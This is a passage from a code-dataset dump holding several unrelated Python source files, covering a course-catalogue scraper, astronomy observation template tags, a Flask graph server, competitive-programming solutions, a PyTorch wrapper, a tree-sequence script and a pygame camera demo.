Training()\n","repo_name":"fitushar/3DUnet_tensorflow2.0","sub_path":"Train_Unet3D.py","file_name":"Train_Unet3D.py","file_ext":"py","file_size_in_byte":7506,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"43"} +{"seq_id":"15956911588","text":"import webapp2\nimport json\nimport OCIScraper\nimport logging\n\nfrom google.appengine.ext import ndb\n\n#ndb model class for each Course that we are storing.\nclass Course(ndb.Model):\n title = ndb.StringProperty()\n professor = ndb.StringProperty()\n time = ndb.StringProperty()\n location = ndb.StringProperty()\n distReqAreas = ndb.StringProperty()\n term = ndb.StringProperty()\n instructorPermissionRequired = ndb.StringProperty()\n final = ndb.StringProperty()\n courseNum = ndb.StringProperty()\n\n description = ndb.TextProperty()\n\n departmentPermissionRequired = ndb.BooleanProperty()\n readingPeriod = ndb.BooleanProperty()\n\n classRating = ndb.FloatProperty() \n professorRating = ndb.FloatProperty()\n workRating = ndb.FloatProperty()\n\n OCInumber = ndb.IntegerProperty()\n\n\n \n\nclass JSONHandler(webapp2.RequestHandler):\n def get(self):\n courses = ndb.gql(\"SELECT * FROM Course\")\n coursesjson = {\"courses\": []}\n for course in courses:\n coursesjson[\"courses\"].append({\"title\": course.title,\n \"professor\": course.professor,\n \"time\": course.time,\n \"location\": course.location,\n \"distReqAreas\": course.distReqAreas,\n \"term\": course.term,\n \"description\": course.description,\n \"finalDescription\" : course.final,\n \"instructorPermissionRequired\": course.instructorPermissionRequired,\n \"departmentPermissionRequired\": course.departmentPermissionRequired,\n \"readingPeriod\":course.readingPeriod,\n \"classRating\": course.classRating,\n \"professorRating\": course.professorRating,\n \"workRating\": course.workRating,\n \"courseNum\": course.courseNum,\n \"OCInumber\": course.OCInumber})\n\n self.response.write(json.dumps(coursesjson))\n\n\n\nclass FetchCoursesHandler(webapp2.RequestHandler):\n def get(self):\n for i in range (20001, 25000):\n courseText = OCIScraper.courseNumberTest(i, 201301)\n\n if courseText:\n courseInfoDict = OCIScraper.parseCourseText(courseText)\n oci = i\n c = Course(title = courseInfoDict[\"courseName\"],\n professor = courseInfoDict[\"professor\"],\n time = courseInfoDict[\"time\"],\n location = courseInfoDict[\"location\"],\n distReqAreas = courseInfoDict[\"distReqAreas\"],\n term = courseInfoDict[\"term\"],\n description = courseInfoDict[\"description\"],\n final = courseInfoDict[\"finalDescription\"],\n instructorPermissionRequired = courseInfoDict[\"instructorPermissionRequired\"],\n departmentPermissionRequired = courseInfoDict[\"departmentPermissionRequired\"],\n readingPeriod = courseInfoDict[\"readingPeriod\"],\n classRating = courseInfoDict[\"classRating\"],\n professorRating = courseInfoDict[\"professorRating\"],\n workRating = courseInfoDict[\"workRating\"],\n courseNum = courseInfoDict[\"courseNum\"],\n OCInumber = oci,\n id = str(oci))\n \n if Course.get_by_id(str(oci)) is None:\n c.put()\n logging.info(str(i))\n\n\n\n\napp = webapp2.WSGIApplication([\n ('/courses', JSONHandler),\n ('/fetch', FetchCoursesHandler)\n], debug=True)\n","repo_name":"andrewmalta13/B9Hackathon","sub_path":"9book/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"23216893295","text":"from datetime import datetime, timedelta\nfrom urllib.parse import urlencode\n\nfrom django import forms, template\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom guardian.shortcuts import get_objects_for_user\nfrom plotly import offline\nimport plotly.graph_objs as go\n\nfrom tom_observations.forms import AddExistingObservationForm, UpdateObservationId\nfrom tom_observations.models import ObservationRecord\nfrom tom_observations.facility import get_service_class, get_service_classes\nfrom tom_observations.observation_template import ApplyObservationTemplateForm\nfrom tom_observations.utils import get_sidereal_visibility\nfrom tom_targets.models import Target\n\n\nregister = template.Library()\n\n\n@register.inclusion_tag('tom_observations/partials/update_status_button.html', takes_context=True)\ndef update_status_button(context):\n \"\"\"\n An inelegant way of passing filters in query parameters while updating observation statuses.\n Used in ObservationListView to retain filters.\n \"\"\"\n return {'query_params': urlencode(context['request'].GET.dict())}\n\n\n@register.filter\ndef display_obs_type(value):\n \"\"\"\n This converts SAMPLE_TITLE into Sample Title. Used for display all-caps observation type in the\n tabs as titles.\n \"\"\"\n return value.replace('_', ' ').title()\n\n\n@register.inclusion_tag('tom_observations/partials/observing_buttons.html')\ndef observing_buttons(target):\n \"\"\"\n Displays the observation buttons for all facilities available in the TOM.\n \"\"\"\n facilities = get_service_classes()\n return {'target': target, 'facilities': facilities}\n\n\n@register.inclusion_tag('tom_observations/partials/existing_observation_form.html')\ndef existing_observation_form(target):\n \"\"\"\n Renders a form for adding an existing API-based observation to a Target.\n \"\"\"\n return {'form': AddExistingObservationForm(initial={'target_id': target.id})}\n\n\n@register.inclusion_tag('tom_observations/partials/update_observation_id_form.html')\ndef update_observation_id_form(obsr):\n \"\"\"\n Renders a form for updating the observation ID for an ObservationRecord.\n \"\"\"\n return {'form': UpdateObservationId(initial={'obsr_id': obsr.id, 'observation_id': obsr.observation_id})}\n\n\n@register.inclusion_tag('tom_observations/partials/observation_type_tabs.html', takes_context=True)\ndef observation_type_tabs(context):\n \"\"\"\n Displays tabs in observation creation form representing each available observation type.\n \"\"\"\n request = context['request']\n query_params = request.GET.copy()\n observation_type = query_params.pop('observation_type', None)\n return {\n 'params': urlencode(query_params),\n 'type_choices': context['type_choices'],\n 'observation_type': observation_type,\n 'facility': context['form']['facility'].value,\n 'target_id': request.GET.get('target_id')\n }\n\n\n@register.inclusion_tag('tom_observations/partials/facility_observation_form.html')\ndef facility_observation_form(target, facility, observation_type):\n \"\"\"\n Displays a form for submitting an observation for a specific facility and observation type, e.g., imaging.\n \"\"\"\n facility_class = get_service_class(facility)()\n initial_fields = {\n 'target_id': target.id,\n 'facility': facility,\n 'observation_type': observation_type\n }\n obs_form = facility_class.get_form(observation_type)(initial=initial_fields)\n obs_form.helper.form_action = reverse('tom_observations:create', kwargs={'facility': facility})\n\n return {'obs_form': obs_form}\n\n\n@register.inclusion_tag('tom_observations/partials/observation_plan.html')\ndef observation_plan(target, facility=None, length=2, interval=60, airmass_limit=None):\n \"\"\"\n Displays form and renders plot for visibility calculation. Using this templatetag to render a plot requires that\n the context of the parent view have values for start_time, end_time, and airmass.\n \"\"\"\n\n visibility_graph = ''\n start_time = datetime.now()\n end_time = start_time + timedelta(days=length)\n\n visibility_data = get_sidereal_visibility(target, start_time, end_time, interval, airmass_limit, facility)\n i = 0\n plot_data = []\n for site, data in visibility_data.items():\n plot_data.append(go.Scatter(x=data[0], y=data[1], mode='markers+lines', marker={'symbol': i}, name=site))\n i += 1\n layout = go.Layout(\n xaxis={'title': 'Date'},\n yaxis={'autorange': 'reversed', 'title': 'Airmass'}\n )\n visibility_graph = offline.plot(\n go.Figure(data=plot_data, layout=layout), output_type='div', show_link=False\n )\n\n return {\n 'visibility_graph': visibility_graph\n }\n\n\n@register.inclusion_tag('tom_observations/partials/observation_list.html', takes_context=True)\ndef observation_list(context, target=None):\n \"\"\"\n Displays a list of all observations in the TOM, limited to an individual target if specified.\n \"\"\"\n if target:\n if settings.TARGET_PERMISSIONS_ONLY:\n observations = target.observationrecord_set.all()\n else:\n observations = get_objects_for_user(\n context['request'].user,\n 'tom_observations.view_observationrecord'\n ).filter(target=target)\n else:\n observations = ObservationRecord.objects.all().order_by('-created')\n return {'observations': observations}\n\n\n@register.inclusion_tag('tom_observations/partials/observationtemplate_run.html')\ndef observationtemplate_run(target):\n \"\"\"\n Renders the form for running an observation template.\n \"\"\"\n form = ApplyObservationTemplateForm(initial={'target': target})\n form.fields['target'].widget = forms.HiddenInput()\n return {'form': form}\n\n\n@register.inclusion_tag('tom_observations/partials/observationtemplate_from_record.html')\ndef observationtemplate_from_record(obsr):\n \"\"\"\n Renders a button that will pre-populate and observation template form with parameters from the specified\n ``ObservationRecord``.\n \"\"\"\n obs_params = obsr.parameters\n obs_params.pop('target_id', None)\n template_params = urlencode(obs_params)\n return {\n 'facility': obsr.facility,\n 'params': template_params\n }\n\n\n@register.inclusion_tag('tom_observations/partials/observation_distribution.html')\ndef observation_distribution(observations):\n \"\"\"\n Displays a plot showing on a map the locations of all observations recorded in the TOM.\n \"\"\"\n\n # \"distinct\" query is not supported, must manually find distinct observation per target\n sorted_observations = observations.order_by('scheduled_end') # ascending so that only the max is preserved\n observation_targets = {}\n for obs in sorted_observations:\n observation_targets[obs.target_id] = (obs.status, obs.terminal)\n\n observation_no_status = [t for t in observation_targets.keys()\n if not observation_targets[t][0]] # status==\"\"\n observation_terminal = [t for t in observation_targets.keys()\n if observation_targets[t][0]\n and observation_targets[t][1]] # status!=\"\" and terminal\n observation_non_terminal = [t for t in observation_targets.keys()\n if observation_targets[t][0]\n and not observation_targets[t][1]] # status!=\"\" and not terminal\n\n targets_no_status = Target.objects.filter(pk__in=observation_no_status)\n targets_terminal = Target.objects.filter(pk__in=observation_terminal)\n targets_non_terminal = Target.objects.filter(pk__in=observation_non_terminal)\n\n locations_no_status = targets_no_status.filter(type=Target.SIDEREAL).values_list('ra', 'dec', 'name')\n locations_terminal = targets_terminal.filter(type=Target.SIDEREAL).values_list('ra', 'dec', 'name')\n locations_non_terminal = targets_non_terminal.filter(type=Target.SIDEREAL).values_list('ra', 'dec', 'name')\n\n data = [\n dict(\n lon=[location[0] for location in locations_no_status],\n lat=[location[1] for location in locations_no_status],\n text=[location[2] for location in locations_no_status],\n hoverinfo='lon+lat+text',\n mode='markers',\n marker=dict(color='rgba(90, 90, 90, .8)'),\n type='scattergeo'\n ),\n dict(\n lon=[location[0] for location in locations_non_terminal],\n lat=[location[1] for location in locations_non_terminal],\n text=[location[2] for location in locations_non_terminal],\n hoverinfo='lon+lat+text',\n mode='markers',\n marker=dict(color='rgba(152, 0, 0, .8)'),\n type='scattergeo'\n ),\n dict(\n lon=[location[0] for location in locations_terminal],\n lat=[location[1] for location in locations_terminal],\n text=[location[2] for location in locations_terminal],\n hoverinfo='lon+lat+text',\n mode='markers',\n marker=dict(color='rgba(0, 152, 0, .8)'),\n type='scattergeo'\n ),\n dict(\n lon=list(range(0, 360, 60))+[180]*4,\n lat=[0]*6+[-60, -30, 30, 60],\n text=list(range(0, 360, 60))+[-60, -30, 30, 60],\n hoverinfo='none',\n mode='text',\n type='scattergeo'\n )\n ]\n layout = {\n 'title': 'Observation Distribution (sidereal)',\n 'hovermode': 'closest',\n 'showlegend': False,\n 'geo': {\n 'projection': {\n 'type': 'mollweide',\n },\n 'showcoastlines': False,\n 'showland': False,\n 'lonaxis': {\n 'showgrid': True,\n 'range': [0, 360],\n },\n 'lataxis': {\n 'showgrid': True,\n 'range': [-90, 90],\n },\n }\n }\n figure = offline.plot(go.Figure(data=data, layout=layout), output_type='div', show_link=False)\n return {'figure': figure}\n\n\n@register.inclusion_tag('tom_observations/partials/facility_status.html')\ndef facility_status():\n \"\"\"\n Collect the facility status from the registered facilities and pass them\n to the facility_status.html partial template.\n See lco.py Facility implementation for example.\n :return:\n \"\"\"\n\n facility_statuses = []\n for facility_class in get_service_classes().values():\n facility = facility_class()\n weather_urls = facility.get_facility_weather_urls()\n status = facility.get_facility_status()\n\n # add the weather_url to the site dictionary\n for site in status.get('sites', []):\n url = next((site_url['weather_url'] for site_url in weather_urls.get('sites', [])\n if site_url['code'] == site['code']), None)\n if url is not None:\n site['weather_url'] = url\n\n facility_statuses.append(status)\n\n return {'facilities': facility_statuses}\n\n\n@register.inclusion_tag('tom_observations/partials/facility_map.html')\ndef facility_map():\n facility_locations = []\n for facility_class in get_service_classes().values():\n facility = facility_class()\n sites = facility.get_observing_sites()\n\n # Flatten each facility site dictionary and add text label for use in facility map\n # Resulting list is of the format [['LCO', 'Siding Spring', 'coj', -31.272, 149.07, 1116], ...]\n facility_locations.extend([\n [facility.name, site_name] + [value for value in site_data.values()]\n for site_name, site_data in sites.items()\n ])\n\n data = [\n dict(\n lat=[site[3] for site in facility_locations],\n lon=[site[4] for site in facility_locations],\n text=[f'{site[0]}: {site[1]}' for site in facility_locations],\n hoverinfo='text',\n mode='markers',\n type='scattergeo'\n )\n ]\n layout = {\n 'title': 'Facility Sites',\n 'hovermode': 'closest',\n 'showlegend': False,\n 'geo': {\n 'projection': {\n 'type': 'mollweide',\n },\n 'showcoastlines': False,\n 'showland': True,\n 'lonaxis': {\n 'showgrid': True,\n 'range': [0, 360],\n },\n 'lataxis': {\n 'showgrid': True,\n 'range': [-90, 90],\n },\n }\n }\n figure = offline.plot(go.Figure(data=data, layout=layout), output_type='div', show_link=False)\n return {'figure': figure}\n","repo_name":"TOMToolkit/tom_base","sub_path":"tom_observations/templatetags/observation_extras.py","file_name":"observation_extras.py","file_ext":"py","file_size_in_byte":12634,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"43"} +{"seq_id":"27414407072","text":"from collections import Counter\nimport urllib.parse\nfrom flask import Flask, jsonify, current_app, request\nfrom flask_cors import CORS\nfrom graphbrain import *\nfrom gbserver.actors import actor_info\nfrom gbserver.conflicts import conflict_topics, conflicts_by_topic\nfrom gbserver.factions import Factions\n\n\napp = Flask(__name__)\nCORS(app)\n\n\ndef topic_url(topic):\n return '/api/conflicts/topic?{}'.format(\n urllib.parse.urlencode({'topic': topic.to_str()}))\n\n\n@app.route('/api/conflicts/topics')\ndef conflicts_topics():\n hg = hgraph(current_app.config['HG'])\n table = {'type': 'table',\n 'columns': ['id', 'label', 'weight', 'url'],\n 'rows': []}\n data = {'viz_blocks': [table]}\n for topic, weight in conflict_topics(hg).most_common():\n url = topic_url(topic),\n row = {'id': topic.to_str(),\n 'label': topic.label(),\n 'weight': weight,\n 'url': url}\n table['rows'].append(row)\n return jsonify(data)\n\n\n@app.route('/api/conflicts/topic')\ndef conflicts_topic():\n topic = hedge(request.args.get('topic'))\n\n graph = {'type': 'graph',\n 'layout': 'force-directed',\n 'topic_label': topic.label(),\n 'nodes': [],\n 'links': []}\n data = {'viz_blocks': [graph]}\n actors = Counter()\n\n hg = hgraph(current_app.config['HG'])\n conflict_pairs = []\n conflicts = conflicts_by_topic(hg, topic)\n for conflict in conflicts:\n conflict_pairs.append(conflict)\n actor1, actor2 = conflict\n actors[actor1] += 1\n actors[actor2] += 1\n conflicts_data = conflicts[conflict]\n weight = len(conflicts_data)\n headlines = [conflict_data['text'] for conflict_data in conflicts_data\n if conflict_data['text'] is not None]\n other_topics = set()\n for conflict_data in conflicts_data:\n for topic in conflict_data['other_topics']:\n other_topics.add(topic)\n\n other_topics = [{'label': t.label(),\n 'url': topic_url(t)} for t in other_topics]\n\n info = {'headlines': headlines,\n 'other_topics': list(other_topics)}\n\n link = {'source': actor1.to_str(),\n 'target': actor2.to_str(),\n 'type': 'conflict',\n 'directed': True,\n 'weight': weight,\n 'label': '',\n 'info': info}\n graph['links'].append(link)\n\n factions = Factions(conflict_pairs)\n\n for actor, weight in actors.most_common():\n node = {'id': actor.to_str(),\n 'label': actor.label(),\n 'faction': 0,\n 'weight': weight,\n 'faction': factions.faction(actor),\n 'info': actor_info(hg, actor)}\n graph['nodes'].append(node)\n return jsonify(data)\n","repo_name":"graphbrain/graphbrain-server","sub_path":"gbserver/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"73375666689","text":"# https://codingcompetitions.withgoogle.com/kickstart/round/0000000000434d9f/0000000000434c0c\n\n#0と隣接しているセルは同時に開示される。\n\ndef graph_scanning_dict(G, s): # ここでGは頂点隣接リストの辞書表現である.\n visited_nodes = set([s])\n boundary_nodes = set([s])\n while len(boundary_nodes) > 0:\n v = boundary_nodes.pop()\n for w in G[v]: # graph_scanningと異なるのは,ここだけである.\n if w not in visited_nodes:\n visited_nodes |= set([w])\n boundary_nodes |= set([w])\n return visited_nodes\n\n\ndef number_connected_components_dict(G): # ここでもGは頂点隣接リストの辞書表現である.\n scanned_nodes = set([])\n remaining_nodes = set(G.keys()) # \n num = 0\n while len(remaining_nodes) > 0:\n v = remaining_nodes.pop()\n num += 1\n visited_nodes = set(graph_scanning_dict(G, v))\n scanned_nodes |= visited_nodes\n remaining_nodes -= visited_nodes\n return num\n\n\n\n\n\nT = int(input())\n\nfor t in range(T):\n N = int(input())\n\n arr = []\n for i in range(N):\n arr.append(list(map(str, input())))\n\n #print(arr)\n #地雷が埋まっているマスと幾つ隣接しているかのリスト\n #地雷があるところは*を挿入しておく\n G = {}\n revealed = [[0] * N for i in range(N)]\n '''\n 注意:2次元配列を生成するとき、リスト内包表記にしないと代入がうまくいかなくなる\n [[0] * N] * Nだとうまくいかない\n 参考: https://qiita.com/oyoshi0022/items/7475951f465d20ad4970\n '''\n for i in range(N):\n for j in range(N): \n if arr[i][j] == \"*\":\n revealed[i][j] = -1\n else:\n G[(i, j)] = []\n\n \n\n # print(arr)\n\n \n \n\n # 地雷が埋まってるマスに関しては隣接リストを作らなくて良い\n for i in range(N):\n for j in range(N):\n if revealed[i][j] == -1:\n if j < N - 1:\n if arr[i][j + 1] == \".\":\n G[(i, j + 1)].append((i, j))\n if i < N - 1 and arr[i + 1][j + 1] == \".\": #一番下じゃない\n G[(i + 1, j + 1)].append((i, j))\n if i < N - 1 and arr[i + 1][j] == \".\":\n G[(i + 1, j)].append((i, j))\n if j > 0 and i < N - 1 and arr[i + 1][j - 1] == \".\":\n G[(i + 1, j - 1)].append((i, j))\n else: # 右端の場合\n if i < N - 1 and arr[i + 1][j] == \".\":\n G[(i + 1, j)].append((i, j))\n if i < N - 1 and arr[i + 1][j - 1] == \".\":\n G[(i + 1, j - 1)].append((i, j))\n else:\n # 左端のマスなら右、下、斜め右下、右端なら下、斜め左下\n if j < N - 1: #右端じゃない場合\n if arr[i][j + 1] == \"*\": \n G[(i, j)].append((i, j + 1))\n if i < N - 1 and arr[i + 1][j + 1] == \"*\": #一番下じゃない&右斜め下\n G[(i, j)].append((i + 1, j + 1))\n if i < N - 1 and arr[i + 1][j] == \"*\": # 一番下じゃない\n G[(i, j)].append((i + 1, j))\n if j > 0 and i < N - 1 and arr[i + 1][j - 1] == \"*\":\n G[(i, j)].append((i + 1, j - 1))\n else: # 右端の場合\n if i < N - 1 and arr[i + 1][j] == \"*\":\n G[(i, j)].append((i + 1, j))\n if i < N - 1 and arr[i + 1][j - 1] == \"*\":\n G[(i, j)].append((i + 1, j - 1))\n\n\n \n \n for i in range(N):\n for j in range(N):\n if revealed[i][j] > -1:\n revealed[i][j] = len(G[(i , j)])\n\n R = {}\n\n for i in range(N):\n for j in range(N): \n if revealed[i][j] > -1:\n R[(i, j)] = []\n \n # print(revealed)\n for i in range(N):\n for j in range(N):\n if revealed[i][j] > 0:\n if len(R[(i, j)]) > 0:\n continue\n if j < N - 1 and revealed[i][j + 1] == 0 and len(R[(i, j)]) < 1: # 右\n R[(i, j)].append((i, j + 1))\n R[(i, j + 1)].append((i, j))\n if i < N - 1 and revealed[i + 1][j] == 0 and len(R[(i, j)]) < 1: #下\n R[(i, j)].append((i + 1, j))\n R[(i + 1, j)].append((i, j))\n if j > 0 and i < N - 1 and revealed[i + 1][j - 1] == 0 and len(R[(i, j)]) < 1:\n R[(i, j)].append((i + 1, j - 1))\n R[(i + 1, j - 1)].append((i, j))\n if j < N - 1 and i < N - 1 and revealed[i + 1][j + 1] == 0 and len(R[(i, j)]) < 1:\n R[(i, j)].append((i + 1, j + 1))\n R[(i + 1, j + 1)].append((i, j))\n elif revealed[i][j] == 0:\n if j < N - 1 and revealed[i][j + 1] == 0: # 右\n R[(i, j)].append((i, j + 1))\n R[(i, j + 1)].append((i, j))\n if i < N - 1 and revealed[i + 1][j] == 0: #下\n R[(i, j)].append((i + 1, j))\n R[(i + 1, j)].append((i, j))\n if j > 0 and i < N - 1 and revealed[i + 1][j - 1] == 0: #左下\n R[(i, j)].append((i + 1, j - 1))\n R[(i + 1, j - 1)].append((i, j))\n if j < N - 1 and i < N - 1 and revealed[i + 1][j + 1] == 0: #右下\n R[(i, j)].append((i + 1, j + 1))\n R[(i + 1, j + 1)].append((i, j))\n if j < N - 1 and revealed[i][j + 1] > 0 and len(R[(i, j + 1)]) < 1: # 右\n R[(i, j)].append((i, j + 1))\n R[(i, j + 1)].append((i, j))\n if i < N - 1 and revealed[i + 1][j] > 0 and len(R[(i + 1, j)]) < 1: #下\n R[(i, j)].append((i + 1, j))\n R[(i + 1, j)].append((i, j))\n if j > 0 and i < N - 1 and revealed[i + 1][j - 1] > 0 and len(R[(i + 1, j - 1)]) < 1: #左下\n R[(i, j)].append((i + 1, j - 1))\n R[(i + 1, j - 1)].append((i, j))\n if j < N - 1 and i < N - 1 and revealed[i + 1][j + 1] > 0 and len(R[(i + 1, j + 1)]) < 1: #右下\n R[(i, j)].append((i + 1, j + 1))\n R[(i + 1, j + 1)].append((i, j))\n print(f'Case #{t + 1}:', number_connected_components_dict(R))\n\n\n\n\n \n \n \n'''\n例外パターン\n001*\n0011\n1100\n*100\n\n0同時が斜めで隣り合う時はつなげない\n\n\n'''\n\n \n\n\n \n \n \n\n'''\n02*20\n13*31\n2*32*\n3*311\n2*200\n\n*..*211**1\n1112*22221\n00012*1111\n00001111*1\n0000000111\n'''","repo_name":"arie0703/coding_practice","sub_path":"questions/g_kickstart/minesweeper.py","file_name":"minesweeper.py","file_ext":"py","file_size_in_byte":6922,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"70876189571","text":"from torch import nn\nfrom copy import deepcopy\n\n\nclass MaskTuner(nn.Module):\n \"\"\"A wrapper that adds several additional convolutional layers.\n The main model remains frozen and is not trained.\n \"\"\"\n def __init__(self, model):\n \"\"\"Initializes MaskTuner.\n Parameters\n ----------\n model : torch.nn.Module\n The model that the mask tuner wraps.\n \"\"\"\n super().__init__()\n self.model = deepcopy(model)\n for param in self.model.parameters():\n param.requires_grad = False\n\n self.conv1 = nn.Conv2d(1, 64, kernel_size=7)\n self.conv2 = nn.Conv2d(64, 128, kernel_size=5)\n self.deconv1 = nn.ConvTranspose2d(128, 64, kernel_size=5)\n self.deconv2 = nn.ConvTranspose2d(64, 1, kernel_size=7)\n\n def forward(self, x):\n x = self.model(x)\n y = self.conv1(x)\n y = self.conv2(y)\n y = self.deconv1(y)\n y = self.deconv2(y)\n y = x + y\n return y\n","repo_name":"bumchik2/HumanSegmentation","sub_path":"post_processing/mask_tuner.py","file_name":"mask_tuner.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40589655847","text":"import os, sys\nimport tskit\nimport numpy as np\nimport msprime\nimport pyslim\n\nfrom tqdm import tqdm\n\nSLIM_TS = '/scratch/gbisshop/bs'\n\nNE = 10000\nMU = 2.5e-6\nREC = 1.25e-8\nS = -0.0025\nL = 1e6\nDELTA_POS = 1E3\n\n\ndef simplify_keeping_unary_in_coal(ts, map_nodes=False):\n \"\"\"\n Keep the unary regions of nodes that are coalescent at least someone in the tree seq\n Temporary hack until https://github.com/tskit-dev/tskit/issues/2127 is addressed\n \"\"\"\n tables = ts.dump_tables()\n # remove existing individuals. We will reinstate them later\n tables.individuals.clear()\n tables.individuals.metadata_schema = tskit.MetadataSchema.permissive_json()\n tables.nodes.individual = np.full_like(tables.nodes.individual, tskit.NULL)\n\n _, node_map = ts.simplify(map_nodes=True)\n keep_nodes = np.where(node_map != tskit.NULL)[0]\n # Add an individual for each coalescent node, so we can run\n # simplify(keep_unary_in_individuals=True) to leave the unary portions in.\n for u in keep_nodes:\n i = tables.individuals.add_row()\n tables.nodes[u] = tables.nodes[u].replace(individual=i)\n node_map = tables.simplify(keep_unary_in_individuals=True, filter_individuals=False)\n\n # Reinstate individuals\n tables.individuals.clear()\n for i in ts.individuals():\n tables.individuals.append(i)\n val, inverted_map = np.unique(node_map, return_index=True)\n inverted_map = inverted_map[val != tskit.NULL]\n tables.nodes.individual = ts.tables.nodes.individual[inverted_map]\n if map_nodes:\n return tables.tree_sequence(), node_map\n else:\n return tables.tree_sequence()\n\n\ndef main():\n rng = np.random.default_rng(101)\n random_seed = rng.integers(0, 2**16)\n ts = tskit.load(os.path.join(SLIM_TS, 'bs.co.false.trees'))\n random_samples = rng.choice(np.arange(20000), replace=False, size=200)\n \n tss = ts.simplify(random_samples, keep_unary=True)\n cotss = simplify_keeping_unary_in_coal(tss)\n cotss.dump(os.path.join(SLIM_TS, 'bs.co.false.subsample.trees'))\n\n height_for_pos = np.zeros(int(cotss.sequence_length))\n for tree in cotss.trees():\n mean_height = np.mean([tree.time(root) for root in tree.roots])\n left, right = map(int, tree.interval)\n height_for_pos[left: right] = mean_height\n height_for_pos.dump('tree_height_bs.npy')\n\n\nif __name__ == '__main__':\n main()","repo_name":"GertjanBisschop/smc-bit-paper","sub_path":"workflow/slim_to_lik.py","file_name":"slim_to_lik.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"28726435738","text":"from sys import exit, stdin, setrecursionlimit\r\nfrom bisect import bisect_left, bisect_right, insort_left, insort_right\r\nfrom collections import defaultdict, deque\r\nfrom heapq import heappop, heappush, heapify\r\nfrom itertools import permutations, combinations, accumulate\r\nfrom math import sqrt\r\nINF = 10**15\r\nMOD = 10**9+7\r\n\r\nL, R = map(int, input().split())\r\n\r\nans = 0\r\nl_keta = len(str(L))\r\nr_leta = len(str(R))\r\n\r\ni = l_keta\r\nnow = L\r\n\r\n#初項a、末項l、項数n\r\ndef S1(a, l, n):\r\n return n*(a+l)//2\r\n\r\n#初項a、公差d、項数n\r\ndef S2(a, d, n):\r\n return n*(2*a + (n-1)*d)//2\r\n\r\nwhile 1:\r\n if pow(10, i) > R:\r\n ans += i * S1(now, R, R-now+1)\r\n break\r\n ans += i * S1(now, pow(10, i)-1, pow(10, i)-now)\r\n now = pow(10, i)\r\n i += 1\r\n ans %= MOD\r\nprint(ans%MOD)\r\n\r\n","repo_name":"susami-jpg/AtCoder","sub_path":"競プロ典型90問/082.py","file_name":"082.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"8865716391","text":"import pygame\nfrom sys import exit\n\n\"\"\"\nA functional/visual representation of the RelativeCamera template found in the functions.py file.\nThis code will initiate a matrix with coordinates relative to a given position in said matrix.\nAllows the 'camera' in a game to follow and stay centered on the player character.\n\nHow to use:\n\"Player character\" is represented by a small green line. Control using arrow keys.\nControl level of zoom with numerical keys 1 and 2.\n\nRed lines are drawn from each node in matrix to center/character, to better illustrate what is happening.\n\nHere is a list of settings that can be changed and what they do:\n matrix_w: Width of the matrix. Controls the size of the \"game world\".\n matrix_h: Height of the matrix. Controls the size of the \"game world\".\n board_width: Width of the game window\n board_height: Height of the game window\n sprite_size: Essentially controls the level of zoom.\n char_pos: Position of the \"player character\" in the matrix. Default is set to center of the matrix\n\"\"\"\n\n# Create matrix\nmatrix_one = []\nmatrix_w = 20\nmatrix_h = 20\nfor _ in range(matrix_h):\n matrix_one.append([None] * matrix_w)\n\n# Board/screen information\nboard_width = 1280\nboard_height = 720\nsprite_size = 25\nmatrix_center_pos = matrix_h / 2, matrix_w / 2\nchar_pos = matrix_center_pos\n\n# Pygame setup\npygame.init()\nscreen = pygame.display.set_mode((board_width, board_height))\nclock = pygame.time.Clock()\nframe_rate = 60\n\ndef offset_center(position):\n \"\"\"Offsets coordinates of everything in a matrix relative to a given position\"\"\"\n h, w = position\n start_h = (board_height / 2) - (sprite_size*h)\n start_w = (board_width / 2) - (sprite_size*w)\n reset_w = start_w\n for i_row, row in enumerate(matrix_one):\n for i_num, num in enumerate(row):\n matrix_one[i_row][i_num] = [start_w, start_h]\n start_w += sprite_size\n start_h += sprite_size\n start_w = reset_w\n #matrix_one[h][w] = \"Character\"\n\n# Build matrix\noffset_center(char_pos)\n#print(matrix_one)\n\n# Game loop\nwhile True:\n # Erase screen each loop\n screen.fill((0, 0, 0))\n \n # Listen for input (keyboard, mouse etc)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n if event.type == pygame.KEYDOWN:\n # Movement\n if event.key == pygame.K_LEFT:\n char_pos = char_pos[0], char_pos[1] - 1\n offset_center(char_pos)\n elif event.key == pygame.K_RIGHT:\n char_pos = char_pos[0], char_pos[1] + 1\n offset_center(char_pos)\n elif event.key == pygame.K_DOWN:\n char_pos = char_pos[0] + 1, char_pos[1]\n offset_center(char_pos)\n elif event.key == pygame.K_UP:\n char_pos = char_pos[0] - 1, char_pos[1]\n offset_center(char_pos)\n # Zoom\n elif event.key == pygame.K_1:\n if sprite_size > 10:\n sprite_size -= 10\n offset_center(char_pos)\n elif event.key == pygame.K_2:\n if sprite_size < 50:\n sprite_size += 10\n offset_center(char_pos)\n #print(matrix_one)\n\n # Draw matrix grid\n line_colour = (255, 0, 0) # Max 255, min 0\n for rows in matrix_one:\n for col in rows:\n xy = (0, 0) if not col else col\n pygame.draw.line(surface=screen,\n color=line_colour,\n start_pos=xy,\n end_pos=(board_width / 2, board_height / 2),\n width=2)\n\n # Draw crosshair at center of screen\n line_colour = (0, 255, 0)\n pygame.draw.line(surface=screen,\n color=line_colour,\n start_pos=((board_width / 2) - 6, board_height / 2),\n end_pos=((board_width / 2) + 7, board_height / 2),\n width=2)\n pygame.draw.line(surface=screen,\n color=line_colour,\n start_pos=((board_width / 2), (board_height / 2) - 6),\n end_pos=((board_width / 2), (board_height / 2) + 7),\n width=2)\n \n\n # Pygame updates\n pygame.display.update()\n 